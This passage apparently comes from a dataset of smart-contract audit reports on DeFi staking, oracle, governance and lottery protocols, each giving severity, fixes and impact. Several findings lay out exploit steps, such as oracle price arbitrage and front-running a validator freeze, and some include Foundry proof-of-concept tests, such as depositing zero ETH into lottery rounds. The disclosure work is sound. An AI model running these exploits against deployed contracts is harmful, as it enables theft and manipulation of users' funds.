Balance = 100 ETH\\nTracked Balance = 100 ETH (Stable Collateral Total = 50 ETH, Margin Deposited Total = 50 ETH)\\nAssume that Bob's long position gains a profit of 51 ETH.\\nThe following actions will trigger the `updateGlobalPositionData` function internally: executeOpen, executeAdjust, executeClose, and liquidation.\\nWhen the `FlatcoinVault.updateGlobalPositionData` function is triggered to update the global position data:\\n```\\nprofitLossTotal = 51 ETH (gain by long)\\n\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 50 ETH + 0 + 51 ETH = 101 ETH\\n\\n_updateStableCollateralTotal(-51 ETH)\\nnewStableCollateralTotal = stableCollateralTotal + _stableCollateralAdjustment\\nnewStableCollateralTotal = 50 ETH + (-51 ETH) = -1 ETH\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0;\\nstableCollateralTotal = 0\\n```\\n\\nIn this case, the state becomes as follows:\\nCollateral Balance = 100 ETH\\nTracked Balance = 101 ETH (Stable Collateral Total = 0 ETH, Margin Deposited Total = 101 ETH)\\nNotice that the Collateral Balance and Tracked Balance are no longer in sync. As such, the revert will occur when the `_getCollateralNet` invariant checks are performed.\\nWhenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, this issue will occur, and the protocol will be bricked. The margin deposited and gain of the long traders can no longer be withdrawn from the protocol. The LPs also cannot withdraw their collateral.\\nThe reason is that the `_getCollateralNet` invariant checks are performed in all functions of the protocol that can be accessed by users (listed below):\\nDeposit\\nWithdraw\\nOpen Position\\nAdjust Position\\nClose Position\\nLiquidateчCurrently, when the loss of the LP is more than the existing `stableCollateralTotal`, the loss will be capped at zero, and it will not go negative. 
In the above example, the `stableCollateralTotal` is 50, and the loss is 51. Thus, the `stableCollateralTotal` is set to zero instead of -1.\\nThe loss of LP and the gain of the trader should be aligned or symmetric. However, this is not the case in the current implementation. In the above example, the gain of traders is 51, while the loss of LP is 50, which results in a discrepancy here.\\nTo fix the issue, the loss of LP and the gain of the trader should be aligned. For instance, in the above example, if the loss of LP is capped at 50, then the profit of traders must also be capped at 50.\\nFollowing is a high-level logic of the fix:\\n```\\nIf (profitLossTotal > stableCollateralTotal): // (51 > 50) => True\\n profitLossTotal = stableCollateralTotal // profitLossTotal = 50\\n \\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal // 50 + 0 + 50 = 100\\n \\nnewStableCollateralTotal = stableCollateralTotal + (-profitLossTotal) // 50 + (-50) = 0\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0; // stableCollateralTotal = 0\\n```\\n\\nThe comment above verifies that the logic is working as intended.чLoss of assets for the users. 
Since the protocol is bricked due to revert, the long traders are unable to withdraw their deposited margin and gain and the LPs cannot withdraw their collateral.ч```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation(\"collateralNet\");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n -Oracle can return different prices in same transactionчmediumчThe Pyth network oracle contract allows to submit and read two different prices in the same transaction. This can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.\\n`OracleModule.sol` uses Pyth network as the primary source of price feeds. This oracle works in the following way:\\nA dedicated network keeps track of the latest price consensus, together with the timestamp.\\nThis data is queried off-chain and submitted to the on-chain oracle.\\nIt is checked that the data submitted is valid and the new price data is stored.\\nNew requests for the latest price will now return the data submitted until a more recent price is submitted.\\nOne thing to note is that the Pyth network is constantly updating the latest price (every 400ms), so when a new price is submitted on-chain it is not necessary that the price is the latest one. 
Otherwise, the process of querying the data off-chain, building the transaction, and submitting it on-chain would be required to be done with a latency of less than 400ms, which is not feasible. This makes it possible to submit two different prices in the same transaction and, thus, fetch two different prices in the same transaction.\\nThis can be used to create some arbitrage opportunities that can make a profit with no risk.\\nHow this can be exploited\\nAn example of how this can be exploited, and showed in the PoC, would be:\\nCreate a small leverage position.\\nAnnounce an adjustment order to increase the size of the position by some amount.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is higher than the first one.\\nExecute the adjustment order sending the first price.\\nExecute the limit close order sending the second price.\\nThe result is approximately a profit of\\n```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n\\nNote: For simplicity, we do not take into account the initial size of the position, which in any case can be insignificant compared to the adjustment size. The keeper fee is also not included, as is the owner of the position that is executing the orders.\\nThe following things are required to make a profit out of this attack:\\nSubmit the orders before other keepers. This can be easily achieved, as there are not always enough incentives to execute the orders as soon as possible.\\nObtain a positive delta between two prices in the time frame where the orders are executable that is greater than twice the trade fees. This can be very feasible, especially in moments of high volatility. 
Note also, that this requirement can be lowered to a delta greater than once the trade fees if we take into account that there is currently another vulnerability that allows to avoid paying fees for the limit order.\\nIn the case of not being able to obtain the required delta or observing that a keeper has already submitted a transaction to execute them before the delta is obtained, the user can simply cancel the limit order and will have just the adjustment order executed.\\nAnother possible strategy would pass through the following steps:\\nCreate a leverage position.\\nAnnounce another leverage position with the same size.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is lower than the first one.\\nExecute the limit close order sending the first price.\\nExecute the open order sending the second price.\\nThe result in this case is having a position with the same size as the original one, but having either lowered the `position.lastPrice` or getting a profit from the original position, depending on how the price has moved since the original position was opened.\\n\\nч```\\nFile: OracleModule.sol\\n FlatcoinStructs.OffchainOracle public offchainOracle; // Offchain Pyth network oracle\\n\\n// Add the line below\\n uint256 public lastOffchainUpdate;\\n\\n (// rest of code)\\n\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n// Add the line below\\n if (lastOffchainUpdate >= block.timestamp) return;\\n// Add the line below\\n lastOffchainUpdate = block.timestamp;\\n// Add the line below\\n\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n```\\nчDifferent oracle prices can be fetched in the same transaction, which can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the 
other side of the trade.ч```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n -OperationalStaking may not possess enough CQT for the last withdrawalчmediumчBoth `_sharesToTokens` and `_tokensToShares` round down instead of rounding off against the user. This can result in users withdrawing a few weis more than they should, which in turn would make the last CQT transfer from the contract revert due to insufficient balance.\\nWhen users `stake`, the shares they will receive are calculated via _tokensToShares:\\n```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n\\nSo the rounding will be against the user, or zero if the user provided the right amount of CQT.\\nWhen users unstake, their shares are decreased by\\n```\\n function _sharesToTokens(\\n uint128 sharesN,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(sharesN) * uint256(rate)) / DIVIDER);\\n }\\n```\\n\\nSo it is possible to `stake` and `unstake` such amounts that would leave a dust amount of shares on user's balance after their full withdrawal. 
However, dust amounts can not be withdrawn due to the check in _redeemRewards:\\n```\\n require(\\n effectiveAmount >= REWARD_REDEEM_THRESHOLD,\\n \"Requested amount must be higher than redeem threshold\"\\n );\\n```\\n\\nBut, if the user does not withdraw immediately, but instead does it after the multiplier is increased, the dust he received from rounding error becomes withdrawable, because his `totalUnlockedValue` becomes greater than `REWARD_REDEEM_THRESHOLD`.\\nSo the user will end up withdrawing more than their `initialStake + shareOfRewards`, which means, if the rounding after all other operations stays net-zero for the protocol, there won't be enough CQT for the last CQT withdrawal (be it `transferUnstakedOut`, `redeemRewards`, or redeemCommission).\\nFoundry PoCч`_sharesToTokens` and `_tokensToShares`, instead of rounding down, should always round off against the user.чVictim's transactions will keep reverting unless they figure out that they need to decrease their withdrawal amount.ч```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n -Frontrunning validator freeze to withdraw tokensчmediumчCovalent implements a freeze mechanism to disable malicious Validators, this allows the protocol to block all interactions with a validator when he behaves maliciously. Covalent also implements a timelock to ensure tokens are only withdraw after a certain amount of time. 
After the cooldown ends, tokens can always be withdrawn.\\nFollowing problem arise now: because the tokens can always be withdrawn, a malicious Validator can listen for a potential \"freeze\" transaction in the mempool, front run this transaction to unstake his tokens and withdraw them after the cooldown end.\\nAlmost every action on the Operational Staking contract checks if the validator is frozen or not:\\n```\\n require(!v.frozen, \"Validator is frozen\");\\n```\\n\\nThe methods transferUnstakedOut() and recoverUnstaking() are both not checking for this, making the unstake transaction front runnable. Here are the only checks of transferUnstakedOut():\\n```\\nrequire(validatorId < validatorsN, \"Invalid validator\");\\n require(_validators[validatorId].unstakings[msg.sender].length > unstakingId, \"Unstaking does not exist\");\\n Unstaking storage us = _validators[validatorId].unstakings[msg.sender][unstakingId];\\n require(us.amount >= amount, \"Unstaking has less tokens\");\\n```\\n\\nThis makes following attack possible:\\nValidator cheats and gets rewarded fees.\\nProtocol notices the misbehavior and initiates a Freeze transaction\\nValidator sees the transaction and starts a unstake() transaction with higher gas.\\nValidator gets frozen, but the unstaking is already done\\nValidator waits for cooldown and withdraws tokens.\\nNow the validator has gained unfairly obtained tokens and withdrawn his stake.чImplement a check if validator is frozen on `transferUnstakedOut()` and `recoverUnstaking()`, and revert transaction if true.\\nIf freezing all unstakings is undesirable (e.g. 
not freezing honest unstakes), the sponsor may consider storing the unstake timestamp as well:\nStore the unstaking block number for each unstake.\nFreeze the validator from a certain past block only; only unstakings that occur from that block onwards will get frozen.чMalicious validators can front-run a freeze to withdraw tokens.ч```\n require(!v.frozen, \"Validator is frozen\");\n```\n -`validatorMaxStake` can be bypassed by using `setValidatorAddress()`чmediumч`setValidatorAddress()` allows a validator to migrate to a new address of their choice. However, the current logic only stacks up the old address' stake to the new one, never checking `validatorMaxStake`.\nThe current logic for `setValidatorAddress()` is as follows:\n```\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\n // // rest of code\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\n delete v.stakings[msg.sender];\n // // rest of code\n}\n```\n\nThe old address' stake is simply stacked on top of the new address' stake. There are no other checks for this amount, even though the new address may already have contained a stake.\nThen the combined total of the two stakings may exceed `validatorMaxStake`. This accordingly allows the new (validator) staker's amount to bypass said threshold, breaking an important invariant of the protocol.\nBob the validator has a self-stake equal to `validatorMaxStake`.\nBob has another address, B2, with some stake delegated to Bob's validator.\nBob migrates to B2.\nBob's stake is stacked on top of B2. 
B2 becomes the new validator address, but their stake has exceeded `validatorMaxStake`.\nB2 can then repeat this procedure with addresses B3, B4, ..., despite B2 already holding more than the max allowed amount.\nBob now holds more stake than he should be able to, allowing him to earn an unfair amount of rewards compared to other validators.\nWe also note that, even if the admin tries to freeze Bob, he can front-run the freeze with an unstake, since unstakes are not blocked from withdrawing (after the cooldown ends).чCheck that the new address's total stake does not exceed `validatorMaxStake` before proceeding with the migration.чBreaking an important invariant of the protocol.\nAllowing any validator to bypass the max stake amount. In turn allows them to earn an unfair amount of validator rewards in the process.\nAllows a validator to unfairly increase their max delegator amount, as an effect of increasing `(validator stake) * maxCapMultiplier`.ч```\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\n // // rest of code\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\n delete v.stakings[msg.sender];\n // // rest of code\n}\n```\n -Nobody can cast for any proposalчmediumч```\nFile: bophades\src\external\governance\GovernorBravoDelegate.sol\n function castVoteInternal(\n address voter,\n uint256 proposalId,\n uint8 support\n ) internal returns (uint256) {\n// rest of code// rest of code\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\n uint256 votes = currentVotes > originalVotes ? 
originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n\\n```\\nfunction getPriorVotes(address account, uint256 blockNumber) external view returns (uint256) {\\n-> require(blockNumber < block.number, \"gOHM::getPriorVotes: not yet determined\");\\n// rest of code// rest of code\\n }\\n```\\n\\nTherefore, L446 will always revert. Voting will not be possible.\\nCopy the coded POC below to one project from Foundry and run `forge test -vvv` to prove this issue.ч```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:- uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n446:+ uint256 currentVotes = gohm.getPriorVotes(voter, block.number - 1);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n```\\n\\n чNobody can cast for any proposal. Not being able to vote means the entire governance contract will be useless. Core functionality is broken.ч```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? 
originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n -User can get free entries if the price of any whitelisted ERC20 token is greater than the round's `valuePerEntry`чhighчLack of explicit separation between ERC20 and ERC721 deposits allows users to gain free entries for any round given there exists a whitelisted ERC20 token with price greater than the round's `valuePerEntry`.\\n```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n\\n```\\n if (singleDeposit.tokenType == YoloV2__TokenType.ERC721) {\\n if (price == 0) {\\n price = _getReservoirPrice(singleDeposit);\\n prices[tokenAddress][roundId] = price;\\n }\\n```\\n\\n```\\n uint256 entriesCount = price / round.valuePerEntry;\\n if (entriesCount == 0) {\\n revert InvalidValue();\\n }\\n```\\n\\n```\\n } else if (tokenType == TokenType.ERC721) {\\n for (uint256 j; j < itemIdsLengthForSingleCollection; ) {\\n // rest of code\\n _executeERC721TransferFrom(items[i].tokenAddress, from, to, itemIds[j]);\\n```\\n\\n```\\n function _executeERC721TransferFrom(address collection, address from, address to, uint256 tokenId) internal {\\n // rest of code\\n (bool status, ) = collection.call(abi.encodeCall(IERC721.transferFrom, (from, to, tokenId)));\\n // rest of code\\n }\\n```\\n\\nThe function signature of `transferFrom` for ERC721 and ERC20 is identical, so this will call `transferFrom` on the ERC20 contract with `amount = 0` (since 'token ids' specified in `singleDeposit.tokenIdsOrAmounts` are all 0). Consequently, the user pays nothing and the transaction executes successfully (as long as the ERC20 token does not revert on zero transfers).\\nPaste the test below into `Yolo.deposit.t.sol` with `forge-std/console.sol` imported. It demonstrates a user making 3 free deposits (in the same transaction) using the MKR token (ie. with zero MKR balance). 
The token used can be substituted with any token with price > `valuePerEntry = 0.01 ETH` (which is non-rebasing/non-taxable and has sufficient liquidity in their /ETH Uniswap v3 pool as specified in the README).\\nчWhitelist tokens using both the token address and the token type (ERC20/ERC721).чUsers can get an arbitrary number of entries into rounds for free (which should generally allow them to significantly increase their chances of winning). In the case the winner is a free depositor, they will end up with the same profit as if they participated normally since they have to pay the fee over the total value of the deposits (which includes the price of their free deposits). If the winner is an honest depositor, they still have to pay the full fee including the free entries, but they are unable to claim the value for the free entries (since the `tokenId` (or amount) is zero). They earn less profit than if everyone had participated honestly.ч```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n -Users can deposit \"0\" ether to any roundчhighчThe main invariant to determine the winner is that the indexes must be in ascending order with no repetitions. Therefore, depositing \"0\" is strictly prohibited as it does not increase the index. However, there is a method by which a user can easily deposit \"0\" ether to any round without any extra costs than gas.\\nAs stated in the summary, depositing \"0\" will not increment the entryIndex, leading to a potential issue with the indexes array. This, in turn, may result in an unfair winner selection due to how the upper bound is determined in the array. 
The relevant code snippet illustrating this behavior is found here.\\nLet's check the following code snippet in the `depositETHIntoMultipleRounds` function\\n```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be \"0\"\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with \"0\" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n\\nas we can see in the above comments added by me starting with \"review\" it explains how its possible. As long as user deposits normally to 1 round then he can also deposit \"0\" amounts to any round because the `expectedValue` will be equal to msg.value.\\nTextual PoC: Assume Alice sends the tx with 1 ether as msg.value and \"amounts\" array as [1 ether, 0, 0]. first time the loop starts the 1 ether will be correctly evaluated in to the round. 
When the loop starts the 2nd and 3rd iterations it won't revert because the following code snippet will be \"0\" and adding 0 to `expectedValue` will not increment to `expectedValue` so the msg.value will be exactly same with the `expectedValue`.\\n```\\nif (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n```\\n\\nCoded PoC (copy the test to `Yolo.deposit.sol` file and run the test):\\n```\\nfunction test_deposit0ToRounds() external {\\n vm.deal(user2, 1 ether);\\n vm.deal(user3, 1 ether);\\n\\n // @dev first round starts normally\\n vm.prank(user2);\\n yolo.deposit{value: 1 ether}(1, _emptyDepositsCalldata());\\n\\n // @dev user3 will deposit 1 ether to the current round(1) and will deposit\\n // 0,0 to round 2 and round3\\n uint256[] memory amounts = new uint256[](3);\\n amounts[0] = 1 ether;\\n amounts[1] = 0;\\n amounts[2] = 0;\\n vm.prank(user3);\\n yolo.depositETHIntoMultipleRounds{value: 1 ether}(amounts);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round2\\n IYoloV2.Deposit[] memory deposits = _getDeposits(2);\\n assertEq(deposits.length, 1);\\n IYoloV2.Deposit memory deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round3\\n deposits = _getDeposits(3);\\n assertEq(deposits.length, 1);\\n deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n }\\n```\\nчAdd the following check inside the 
depositETHIntoMultipleRounds function\\n```\\nif (depositAmount == 0) {\\n revert InvalidValue();\\n }\\n```\\nчHigh, since it will alter the games winner selection and it is very cheap to perform the attack.ч```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be \"0\"\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with \"0\" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n -The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUNDчmediumчThe number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, because there is no such check in depositETHIntoMultipleRounds() function or rolloverETH() function.\\ndepositETHIntoMultipleRounds() function is called to deposit ETH into multiple rounds, so it's possible that the number of deposits in both current round and next round is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nWhen current round's number of deposits reaches MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, the round is drawn:\\n```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n 
}\\n```\\n\\n_drawWinner() function calls VRF provider to get a random number, when the random number is returned by VRF provider, fulfillRandomWords() function is called to chose the winner and the next round will be started:\\n```\\n _startRound({_roundsCount: roundId});\\n```\\n\\nIf the next round's deposit number is also MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, _startRound() function may also draw the next round as well, so it seems that there is no chance the the number of deposits in a round can become larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n if (\\n !paused() &&\\n _shouldDrawWinner(numberOfParticipants, round.maximumNumberOfParticipants, round.deposits.length)\\n ) {\\n _drawWinner(round, roundId);\\n }\\n```\\n\\nHowever, _startRound() function will draw the round only if the protocol is not paused. Imagine the following scenario:\\nThe deposit number in `round 1` and `round 2` is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND;\\n`round 1` is drawn, before random number is sent back by VRF provider, the protocol is paused by the admin for some reason;\\nRandom number is returned and fulfillRandomWords() function is called to start round 2;\\nBecause protocol is paused, `round 2` is set to OPEN but not drawn;\\nLater admin unpauses the protocol, before drawWinner() function can be called, some users may deposit more funds into `round 2` by calling depositETHIntoMultipleRounds() function or rolloverETH() function, this will make the deposit number of `round 2` larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nPlease run the test code to verify:\\n```\\n function test_audit_deposit_more_than_max() public {\\n address alice = makeAddr(\"Alice\");\\n address bob = makeAddr(\"Bob\");\\n\\n vm.deal(alice, 2 ether);\\n vm.deal(bob, 2 ether);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 0.01 ether;\\n amounts[1] = 0.01 ether;\\n\\n // Users deposit to make the deposit number equals to MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND in both 
rounds\\n uint256 MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND = 100;\\n for (uint i; i < MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND / 2; ++i) {\\n vm.prank(alice);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n }\\n\\n // owner pause the protocol before random word returned\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // random word returned and round 2 is started but not drawn\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n uint256 randomWord = 123;\\n randomWords[0] = randomWord;\\n yolo.rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID, randomWords);\\n\\n // owner unpause the protocol\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // User deposits into round 2\\n amounts = new uint256[](1);\\n amounts[0] = 0.01 ether;\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.01 ether}(amounts);\\n\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n YoloV2.Deposit[] memory round2Deposits\\n ) = yolo.getRound(2);\\n\\n // the number of deposits in round 2 is larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND\\n assertEq(round2Deposits.length, MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND + 1);\\n }\\n```\\nчAdd check in _depositETH() function which is called by both depositETHIntoMultipleRounds() function and rolloverETH() function to ensure the deposit number cannot be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n uint256 roundDepositCount = round.deposits.length;\\n\\n// Add the line below\\n if (roundDepositCount >= MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND) {\\n// Add the line below\\n revert MaximumNumberOfDepositsReached();\\n// Add the line below\\n }\\n\\n _validateOnePlayerCannotFillUpTheWholeRound(_unsafeAdd(roundDepositCount, 1), round.numberOfParticipants);\\n```\\nчThis issue break the invariant that the number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.ч```\\n if (\\n 
_shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n -Low precision is used when checking spot price deviationчmediumчLow precision is used when checking spot price deviation, which might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.\\nAssume the following:\\nThe max deviation is set to 1%\\n`nTokenOracleValue` is 1,000,000,000\\n`nTokenSpotValue` is 980,000,001\\n```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n\\n```\\nFile: nTokenCalculations.sol\\n int256 maxValueDeviationPercent = int256(\\n uint256(uint8(nToken.parameters[Constants.MAX_MINT_DEVIATION_LIMIT]))\\n );\\n // Check deviation limit here\\n int256 deviationInPercentage = nTokenOracleValue.sub(nTokenSpotValue).abs()\\n .mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n require(deviationInPercentage <= maxValueDeviationPercent, \"Over Deviation Limit\");\\n```\\n\\nBased on the above formula:\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * Constants.PERCENTAGE_DECIMALS) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 100) / 1,000,000,000\\n(19,999,999 * 100) / 1,000,000,000\\n1,999,999,900 / 1,000,000,000 = 1.9999999 = 1\\n```\\n\\nThe above shows that the oracle and spot values have deviated by 1.99999%, which is close to 2%. 
However, due to a rounding error, it is rounded down to 1%, and the TX will not revert.чConsider increasing the precision.\\nFor instance, increasing the precision from `Constants.PERCENTAGE_DECIMALS` (100) to 1e8 would have caught the issue mentioned earlier in the report even after the rounding down.\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(1e8).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * 1e8) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 1e8) / 1,000,000,000\\n(19,999,999 * 1e8) / 1,000,000,000 = 1999999.9 = 1999999\\n```\\n\\n1% of 1e8 = 1000000\\n```\\nrequire(deviationInPercentage <= maxValueDeviationPercent, \"Over Deviation Limit\")\\nrequire(1999999 <= 1000000, \"Over Deviation Limit\") => Revert\\n```\\nчThe purpose of the deviation check is to ensure that the spot market value is not manipulated. If the deviation check is not accurate, it might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.ч```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n -The use of spot data when discounting is subjected to manipulationчmediumчThe use of spot data when discounting is subjected to manipulation. As a result, malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.\\nWhen redeeming wfCash before maturity, the `_sellfCash` function will be executed.\\nAssume that there is insufficient fCash left on the wrapper to be sold back to the Notional AMM. In this case, the `getPrincipalFromfCashBorrow` view function will be used to calculate the number of prime cash to be withdrawn for a given fCash amount and sent to the users.\\nNote that the `getPrincipalFromfCashBorrow` view function uses the spot data (spot interest rate, spot utilization, spot totalSupply/totalDebt, etc.) 
